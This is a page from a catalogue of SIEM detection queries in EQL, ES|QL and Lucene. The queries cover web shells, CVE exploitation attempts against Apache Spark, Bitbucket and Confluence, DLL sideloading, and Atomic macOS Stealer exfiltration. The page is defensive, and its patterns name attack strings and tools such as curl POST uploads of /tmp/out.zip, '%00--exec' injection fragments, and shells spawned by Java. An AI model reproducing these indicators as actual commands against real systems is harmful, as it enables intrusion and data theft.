Tool
Splunk
12,786 vendor-native detections · ready to paste into your SIEM · cross-linked to ATT&CK
◈
Detections
50 shown of 12,786Antivirus Relevant File Paths Alerts
Detects an Antivirus alert in a highly relevant file path or with a relevant file name.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Show query
any where (Filename like~ ("*:\\PerfLogs\\*", "*:\\Temp\\*", "*:\\Users\\Default\\*", "*:\\Users\\Public\\*", "*:\\Windows\\*", "*/www/*", "*\\inetpub\\*", "*\\tsclient\\*", "*apache*", "*nginx*", "*tomcat*", "*weblogic*")) or (Filename like~ ("*.asax", "*.ashx", "*.asmx", "*.asp", "*.aspx", "*.bat", "*.cfm", "*.cgi", "*.chm", "*.cmd", "*.dat", "*.ear", "*.gif", "*.hta", "*.jpeg", "*.jpg", "*.jsp", "*.jspx", "*.lnk", "*.msc", "*.php", "*.pl", "*.png", "*.ps1", "*.psm1", "*.py", "*.pyc", "*.rb", "*.scf", "*.sct", "*.sh", "*.svg", "*.txt", "*.vbe", "*.vbs", "*.war", "*.wll", "*.wsf", "*.wsh", "*.xll", "*.xml"))Antivirus Relevant File Paths Alerts
Detects an Antivirus alert in a highly relevant file path or with a relevant file name.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Show query
from * metadata _id, _index, _version | where Filename like "*:\\PerfLogs\\*" or Filename like "*:\\Temp\\*" or Filename like "*:\\Users\\Default\\*" or Filename like "*:\\Users\\Public\\*" or Filename like "*:\\Windows\\*" or Filename like "*/www/*" or Filename like "*\\inetpub\\*" or Filename like "*\\tsclient\\*" or Filename like "*apache*" or Filename like "*nginx*" or Filename like "*tomcat*" or Filename like "*weblogic*" or ends_with(Filename, ".asax") or ends_with(Filename, ".ashx") or ends_with(Filename, ".asmx") or ends_with(Filename, ".asp") or ends_with(Filename, ".aspx") or ends_with(Filename, ".bat") or ends_with(Filename, ".cfm") or ends_with(Filename, ".cgi") or ends_with(Filename, ".chm") or ends_with(Filename, ".cmd") or ends_with(Filename, ".dat") or ends_with(Filename, ".ear") or ends_with(Filename, ".gif") or ends_with(Filename, ".hta") or ends_with(Filename, ".jpeg") or ends_with(Filename, ".jpg") or ends_with(Filename, ".jsp") or ends_with(Filename, ".jspx") or ends_with(Filename, ".lnk") or ends_with(Filename, ".msc") or ends_with(Filename, ".php") or ends_with(Filename, ".pl") or ends_with(Filename, ".png") or ends_with(Filename, ".ps1") or ends_with(Filename, ".psm1") or ends_with(Filename, ".py") or ends_with(Filename, ".pyc") or ends_with(Filename, ".rb") or ends_with(Filename, ".scf") or ends_with(Filename, ".sct") or ends_with(Filename, ".sh") or ends_with(Filename, ".svg") or ends_with(Filename, ".txt") or ends_with(Filename, ".vbe") or ends_with(Filename, ".vbs") or ends_with(Filename, ".war") or ends_with(Filename, ".wll") or ends_with(Filename, ".wsf") or ends_with(Filename, ".wsh") or ends_with(Filename, ".xll") or ends_with(Filename, ".xml")
Antivirus Relevant File Paths Alerts
Detects an Antivirus alert in a highly relevant file path or with a relevant file name.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Show query
(Filename:(*\:\\PerfLogs\\* OR *\:\\Temp\\* OR *\:\\Users\\Default\\* OR *\:\\Users\\Public\\* OR *\:\\Windows\\* OR *\/www\/* OR *\\inetpub\\* OR *\\tsclient\\* OR *apache* OR *nginx* OR *tomcat* OR *weblogic*)) OR (Filename:(*.asax OR *.ashx OR *.asmx OR *.asp OR *.aspx OR *.bat OR *.cfm OR *.cgi OR *.chm OR *.cmd OR *.dat OR *.ear OR *.gif OR *.hta OR *.jpeg OR *.jpg OR *.jsp OR *.jspx OR *.lnk OR *.msc OR *.php OR *.pl OR *.png OR *.ps1 OR *.psm1 OR *.py OR *.pyc OR *.rb OR *.scf OR *.sct OR *.sh OR *.svg OR *.txt OR *.vbe OR *.vbs OR *.war OR *.wll OR *.wsf OR *.wsh OR *.xll OR *.xml))
Antivirus Web Shell Detection
Detects a highly relevant Antivirus alert that reports a web shell.
It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Show query
any where (Signature like~ ("ASP.*", "IIS/BackDoor*", "JAVA/Backdoor*", "JSP.*", "Perl.*", "PHP.*", "Troj/ASP*", "Troj/JSP*", "Troj/PHP*", "VBS/Uxor*")) or (Signature like~ ("*ASP_*", "*ASP:*", "*ASP.Agent*", "*ASP/*", "*Aspdoor*", "*ASPXSpy*", "*Backdoor.ASP*", "*Backdoor.Java*", "*Backdoor.JSP*", "*Backdoor.PHP*", "*Backdoor.VBS*", "*Backdoor/ASP*", "*Backdoor/Java*", "*Backdoor/JSP*", "*Backdoor/PHP*", "*Backdoor/VBS*", "*C99shell*", "*Chopper*", "*filebrowser*", "*JSP_*", "*JSP:*", "*JSP.Agent*", "*JSP/*", "*Perl:*", "*Perl/*", "*PHP_*", "*PHP:*", "*PHP.Agent*", "*PHP/*", "*PHPShell*", "*PShlSpy*", "*SinoChoper*", "*Trojan.ASP*", "*Trojan.JSP*", "*Trojan.PHP*", "*Trojan.VBS*", "*VBS.Agent*", "*VBS/Agent*", "*Webshell*"))Antivirus Web Shell Detection
Detects a highly relevant Antivirus alert that reports a web shell.
It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Show query
from * metadata _id, _index, _version | where starts_with(Signature, "ASP.") or starts_with(Signature, "IIS/BackDoor") or starts_with(Signature, "JAVA/Backdoor") or starts_with(Signature, "JSP.") or starts_with(Signature, "Perl.") or starts_with(Signature, "PHP.") or starts_with(Signature, "Troj/ASP") or starts_with(Signature, "Troj/JSP") or starts_with(Signature, "Troj/PHP") or starts_with(Signature, "VBS/Uxor") or Signature like "*ASP_*" or Signature like "*ASP:*" or Signature like "*ASP.Agent*" or Signature like "*ASP/*" or Signature like "*Aspdoor*" or Signature like "*ASPXSpy*" or Signature like "*Backdoor.ASP*" or Signature like "*Backdoor.Java*" or Signature like "*Backdoor.JSP*" or Signature like "*Backdoor.PHP*" or Signature like "*Backdoor.VBS*" or Signature like "*Backdoor/ASP*" or Signature like "*Backdoor/Java*" or Signature like "*Backdoor/JSP*" or Signature like "*Backdoor/PHP*" or Signature like "*Backdoor/VBS*" or Signature like "*C99shell*" or Signature like "*Chopper*" or Signature like "*filebrowser*" or Signature like "*JSP_*" or Signature like "*JSP:*" or Signature like "*JSP.Agent*" or Signature like "*JSP/*" or Signature like "*Perl:*" or Signature like "*Perl/*" or Signature like "*PHP_*" or Signature like "*PHP:*" or Signature like "*PHP.Agent*" or Signature like "*PHP/*" or Signature like "*PHPShell*" or Signature like "*PShlSpy*" or Signature like "*SinoChoper*" or Signature like "*Trojan.ASP*" or Signature like "*Trojan.JSP*" or Signature like "*Trojan.PHP*" or Signature like "*Trojan.VBS*" or Signature like "*VBS.Agent*" or Signature like "*VBS/Agent*" or Signature like "*Webshell*"
Antivirus Web Shell Detection
Detects a highly relevant Antivirus alert that reports a web shell.
It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Show query
(Signature:(ASP.* OR IIS\/BackDoor* OR JAVA\/Backdoor* OR JSP.* OR Perl.* OR PHP.* OR Troj\/ASP* OR Troj\/JSP* OR Troj\/PHP* OR VBS\/Uxor*)) OR (Signature:(*ASP_* OR *ASP\:* OR *ASP.Agent* OR *ASP\/* OR *Aspdoor* OR *ASPXSpy* OR *Backdoor.ASP* OR *Backdoor.Java* OR *Backdoor.JSP* OR *Backdoor.PHP* OR *Backdoor.VBS* OR *Backdoor\/ASP* OR *Backdoor\/Java* OR *Backdoor\/JSP* OR *Backdoor\/PHP* OR *Backdoor\/VBS* OR *C99shell* OR *Chopper* OR *filebrowser* OR *JSP_* OR *JSP\:* OR *JSP.Agent* OR *JSP\/* OR *Perl\:* OR *Perl\/* OR *PHP_* OR *PHP\:* OR *PHP.Agent* OR *PHP\/* OR *PHPShell* OR *PShlSpy* OR *SinoChoper* OR *Trojan.ASP* OR *Trojan.JSP* OR *Trojan.PHP* OR *Trojan.VBS* OR *VBS.Agent* OR *VBS\/Agent* OR *Webshell*))
Apache Segmentation Fault
Detects a segmentation fault error message caused by a crashing apache worker process
Show query
any where "exit signal Segmentation Fault"
Apache Segmentation Fault
Detects a segmentation fault error message caused by a crashing apache worker process
Show query
*exit\ signal\ Segmentation\ Fault*
Apache Spark Shell Command Injection - ProcessCreation
Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
Show query
any where ParentImage:"*\\bash" and (CommandLine like~ ("*id -Gn `*", "*id -Gn '*"))Apache Spark Shell Command Injection - ProcessCreation
Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
Show query
from * metadata _id, _index, _version | where ends_with(ParentImage, "\\bash") and (CommandLine like "*id -Gn `*" or CommandLine like "*id -Gn '*")
Apache Spark Shell Command Injection - ProcessCreation
Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
Show query
ParentImage:*\\bash AND (CommandLine:(*id\ \-Gn\ `* OR *id\ \-Gn\ '*))
Apache Spark Shell Command Injection - Weblogs
Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective
Show query
any where cs-uri-query:"*?doAs=`*"
Apache Spark Shell Command Injection - Weblogs
Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective
Show query
from * metadata _id, _index, _version | where `cs-uri-query` like "*?doAs=`*"
Apache Spark Shell Command Injection - Weblogs
Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective
Show query
cs-uri-query:*?doAs\=`*
App Granted Microsoft Permissions
Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD
Show query
any where properties.message like~ ("Add delegated permission grant", "Add app role assignment to service principal")App Granted Microsoft Permissions
Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD
Show query
from * metadata _id, _index, _version | where properties.message in ("Add delegated permission grant", "Add app role assignment to service principal")App Granted Microsoft Permissions
Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD
Show query
properties.message:(Add\ delegated\ permission\ grant OR Add\ app\ role\ assignment\ to\ service\ principal)
App Granted Privileged Delegated Or App Permissions
Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions
Show query
any where properties.message:"Add app role assignment to service principal"
App Granted Privileged Delegated Or App Permissions
Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions
Show query
from * metadata _id, _index, _version | where properties.message=="Add app role assignment to service principal"
App Granted Privileged Delegated Or App Permissions
Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions
Show query
properties.message:Add\ app\ role\ assignment\ to\ service\ principal
Elastic
Converted
EQL
high
AppX Located in Known Staging Directory Added to Deployment Pipeline
Detects an appx package that was added to the pipeline of the "to be processed" packages that is located in a known folder often used as a staging directory.
Show query
any where EventID:854 and ((Path like~ ("*:/Perflogs/*", "*:/Users/Public/*", "*:/Windows/Temp/*", "*/AppdData/Local/Temp/*", "*/Desktop/*", "*/Downloads/*")) or (Path like~ ("*:\\PerfLogs\\*", "*:\\Users\\Public\\*", "*:\\Windows\\Temp\\*", "*\\AppdData\\Local\\Temp\\*", "*\\Desktop\\*", "*\\Downloads\\*")))
Elastic
Converted
ES|QL
high
AppX Located in Known Staging Directory Added to Deployment Pipeline
Detects an appx package that was added to the pipeline of the "to be processed" packages that is located in a known folder often used as a staging directory.
Show query
from * metadata _id, _index, _version | where EventID==854 and (Path like "*:/Perflogs/*" or Path like "*:/Users/Public/*" or Path like "*:/Windows/Temp/*" or Path like "*/AppdData/Local/Temp/*" or Path like "*/Desktop/*" or Path like "*/Downloads/*" or Path like "*:\\PerfLogs\\*" or Path like "*:\\Users\\Public\\*" or Path like "*:\\Windows\\Temp\\*" or Path like "*\\AppdData\\Local\\Temp\\*" or Path like "*\\Desktop\\*" or Path like "*\\Downloads\\*")
Elastic
Converted
Lucene
high
AppX Located in Known Staging Directory Added to Deployment Pipeline
Detects an appx package that was added to the pipeline of the "to be processed" packages that is located in a known folder often used as a staging directory.
Show query
EventID:854 AND ((Path:(*\:\/Perflogs\/* OR *\:\/Users\/Public\/* OR *\:\/Windows\/Temp\/* OR *\/AppdData\/Local\/Temp\/* OR *\/Desktop\/* OR *\/Downloads\/*)) OR (Path:(*\:\\PerfLogs\\* OR *\:\\Users\\Public\\* OR *\:\\Windows\\Temp\\* OR *\\AppdData\\Local\\Temp\\* OR *\\Desktop\\* OR *\\Downloads\\*)))
Application AppID Uri Configuration Changes
Detects when a configuration change is made to an applications AppID URI.
Show query
any where properties.message like~ ("Update Application", "Update Service principal")Application AppID Uri Configuration Changes
Detects when a configuration change is made to an applications AppID URI.
Show query
from * metadata _id, _index, _version | where properties.message in ("Update Application", "Update Service principal")Application AppID Uri Configuration Changes
Detects when a configuration change is made to an applications AppID URI.
Show query
properties.message:(Update\ Application OR Update\ Service\ principal)
Application URI Configuration Changes
Detects when a configuration change is made to an applications URI.
URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
Show query
any where properties.message:"Update Application Sucess- Property Name AppAddress"
Application URI Configuration Changes
Detects when a configuration change is made to an applications URI.
URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
Show query
from * metadata _id, _index, _version | where properties.message=="Update Application Sucess- Property Name AppAddress"
Application URI Configuration Changes
Detects when a configuration change is made to an applications URI.
URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
Show query
properties.message:Update\ Application\ Sucess\-\ Property\ Name\ AppAddress
Arbitrary File Download Via IMEWDBLD.EXE
Detects usage of "IMEWDBLD.exe" to download arbitrary files
Show query
any where (Image:"*\\IMEWDBLD.exe" or OriginalFileName:"imewdbld.exe") and (CommandLine like~ ("*http://*", "*https://*"))Arbitrary File Download Via IMEWDBLD.EXE
Detects usage of "IMEWDBLD.exe" to download arbitrary files
Show query
from * metadata _id, _index, _version | where (ends_with(Image, "\\IMEWDBLD.exe") or OriginalFileName=="imewdbld.exe") and (CommandLine like "*http://*" or CommandLine like "*https://*")
Arbitrary File Download Via IMEWDBLD.EXE
Detects usage of "IMEWDBLD.exe" to download arbitrary files
Show query
(Image:*\\IMEWDBLD.exe OR OriginalFileName:imewdbld.exe) AND (CommandLine:(*http\:\/\/* OR *https\:\/\/*))
Aruba Network Service Potential DLL Sideloading
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
Show query
any where (Image:"*\\arubanetsvc.exe" and (ImageLoaded like~ ("*\\wtsapi32.dll", "*\\msvcr100.dll", "*\\msvcp100.dll", "*\\dbghelp.dll", "*\\dbgcore.dll", "*\\wininet.dll", "*\\iphlpapi.dll", "*\\version.dll", "*\\cryptsp.dll", "*\\cryptbase.dll", "*\\wldp.dll", "*\\profapi.dll", "*\\sspicli.dll", "*\\winsta.dll", "*\\dpapi.dll"))) and (not (ImageLoaded like~ ("C:\\Windows\\System32\\*", "C:\\Windows\\SysWOW64\\*", "C:\\Windows\\WinSxS\\*")))Aruba Network Service Potential DLL Sideloading
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
Show query
from * metadata _id, _index, _version | where ends_with(Image, "\\arubanetsvc.exe") and (ends_with(ImageLoaded, "\\wtsapi32.dll") or ends_with(ImageLoaded, "\\msvcr100.dll") or ends_with(ImageLoaded, "\\msvcp100.dll") or ends_with(ImageLoaded, "\\dbghelp.dll") or ends_with(ImageLoaded, "\\dbgcore.dll") or ends_with(ImageLoaded, "\\wininet.dll") or ends_with(ImageLoaded, "\\iphlpapi.dll") or ends_with(ImageLoaded, "\\version.dll") or ends_with(ImageLoaded, "\\cryptsp.dll") or ends_with(ImageLoaded, "\\cryptbase.dll") or ends_with(ImageLoaded, "\\wldp.dll") or ends_with(ImageLoaded, "\\profapi.dll") or ends_with(ImageLoaded, "\\sspicli.dll") or ends_with(ImageLoaded, "\\winsta.dll") or ends_with(ImageLoaded, "\\dpapi.dll")) and not (starts_with(ImageLoaded, "C:\\Windows\\System32\\") or starts_with(ImageLoaded, "C:\\Windows\\SysWOW64\\") or starts_with(ImageLoaded, "C:\\Windows\\WinSxS\\"))
Aruba Network Service Potential DLL Sideloading
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
Show query
(Image:*\\arubanetsvc.exe AND (ImageLoaded:(*\\wtsapi32.dll OR *\\msvcr100.dll OR *\\msvcp100.dll OR *\\dbghelp.dll OR *\\dbgcore.dll OR *\\wininet.dll OR *\\iphlpapi.dll OR *\\version.dll OR *\\cryptsp.dll OR *\\cryptbase.dll OR *\\wldp.dll OR *\\profapi.dll OR *\\sspicli.dll OR *\\winsta.dll OR *\\dpapi.dll))) AND (NOT (ImageLoaded:(C\:\\Windows\\System32\\* OR C\:\\Windows\\SysWOW64\\* OR C\:\\Windows\\WinSxS\\*)))
Atera Agent Installation
Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators
Show query
any where EventID:1033 and Provider_Name:"MsiInstaller" and Message:"*AteraAgent*"
Atera Agent Installation
Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators
Show query
from * metadata _id, _index, _version | where EventID==1033 and Provider_Name=="MsiInstaller" and Message like "*AteraAgent*"
Atera Agent Installation
Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators
Show query
EventID:1033 AND Provider_Name:MsiInstaller AND Message:*AteraAgent*
Atlassian Bitbucket Command Injection Via Archive API
Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804
Show query
any where cs-uri-query:"*/rest/api/latest/projects/*" and cs-uri-query:"*prefix=*" and cs-uri-query:"*%00--exec*"
Atlassian Bitbucket Command Injection Via Archive API
Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804
Show query
from * metadata _id, _index, _version | where `cs-uri-query` like "*/rest/api/latest/projects/*" and `cs-uri-query` like "*prefix=*" and `cs-uri-query` like "*%00--exec*"
Atlassian Bitbucket Command Injection Via Archive API
Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804
Show query
cs-uri-query:*\/rest\/api\/latest\/projects\/* AND cs-uri-query:*prefix\=* AND cs-uri-query:*%00\-\-exec*
Atlassian Confluence CVE-2022-26134
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
Show query
any where ParentImage:"/opt/atlassian/confluence/*" and ParentImage:"*/java" and (CommandLine like~ ("*/bin/sh*", "*bash*", "*dash*", "*ksh*", "*zsh*", "*csh*", "*fish*", "*curl*", "*wget*", "*python*"))Atlassian Confluence CVE-2022-26134
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
Show query
from * metadata _id, _index, _version | where starts_with(ParentImage, "/opt/atlassian/confluence/") and ends_with(ParentImage, "/java") and (CommandLine like "*/bin/sh*" or CommandLine like "*bash*" or CommandLine like "*dash*" or CommandLine like "*ksh*" or CommandLine like "*zsh*" or CommandLine like "*csh*" or CommandLine like "*fish*" or CommandLine like "*curl*" or CommandLine like "*wget*" or CommandLine like "*python*")
Atlassian Confluence CVE-2022-26134
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
Show query
ParentImage:\/opt\/atlassian\/confluence\/* AND ParentImage:*\/java AND (CommandLine:(*\/bin\/sh* OR *bash* OR *dash* OR *ksh* OR *zsh* OR *csh* OR *fish* OR *curl* OR *wget* OR *python*))
Atomic MacOS Stealer - FileGrabber Activity
Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
Show query
any where (CommandLine:"*curl*" and CommandLine:"*POST*" and CommandLine:"*user:*" and CommandLine:"*-H *" and CommandLine:"*BuildID*" and CommandLine:"*file=@/tmp/out.zip*" and CommandLine:"*cl: 0*") or (CommandLine:"*FileGrabber*" and CommandLine:"*/tmp*")
Atomic MacOS Stealer - FileGrabber Activity
Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
Show query
from * metadata _id, _index, _version | where CommandLine like "*curl*" and CommandLine like "*POST*" and CommandLine like "*user:*" and CommandLine like "*-H *" and CommandLine like "*BuildID*" and CommandLine like "*file=@/tmp/out.zip*" and CommandLine like "*cl: 0*" or CommandLine like "*FileGrabber*" and CommandLine like "*/tmp*"
Atomic MacOS Stealer - FileGrabber Activity
Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
Show query
(CommandLine:*curl* AND CommandLine:*POST* AND CommandLine:*user\:* AND CommandLine:*\-H\ * AND CommandLine:*BuildID* AND CommandLine:*file\=@\/tmp\/out.zip* AND CommandLine:*cl\:\ 0*) OR (CommandLine:*FileGrabber* AND CommandLine:*\/tmp*)
Atomic MacOS Stealer - Persistence Indicators
Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
Show query
any where (Image:"*/curl" and TargetFilename:"/Users/*" and TargetFilename:"*.helper") or TargetFilename:"/Library/LaunchDaemons/com.finder.helper.plist"
Atomic MacOS Stealer - Persistence Indicators
Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
Show query
from * metadata _id, _index, _version | where ends_with(Image, "/curl") and starts_with(TargetFilename, "/Users/") and ends_with(TargetFilename, ".helper") or TargetFilename=="/Library/LaunchDaemons/com.finder.helper.plist"
Atomic MacOS Stealer - Persistence Indicators
Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
Show query
(Image:*\/curl AND TargetFilename:\/Users\/* AND TargetFilename:*.helper) OR TargetFilename:\/Library\/LaunchDaemons\/com.finder.helper.plist
Showing 701-750 of 12,786